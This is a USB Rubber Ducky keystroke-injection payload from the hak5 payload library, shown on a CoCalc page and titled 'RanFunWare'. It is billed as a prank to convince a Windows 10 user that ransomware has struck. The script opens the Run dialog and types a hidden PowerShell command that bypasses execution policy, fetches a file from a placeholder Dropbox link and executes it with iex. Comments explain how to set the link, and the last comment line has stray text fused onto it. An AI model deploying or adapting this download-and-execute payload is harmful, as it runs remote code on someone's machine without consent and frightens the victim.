Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/prank/RanFunWare/payload.txt
2968 views
1
REM Title: RanFunWare
2
3
REM Author: atomiczsec
4
5
REM Description: This payload will prank your target into thinking their machine got hit with ransomware.
6
7
REM Target: Windows 10
8
9
DELAY 2000
10
GUI r
11
DELAY 500
12
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
13
ENTER
14
15
REM Remember to replace the link with your DropBox shared link for the intended file to download
16
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
17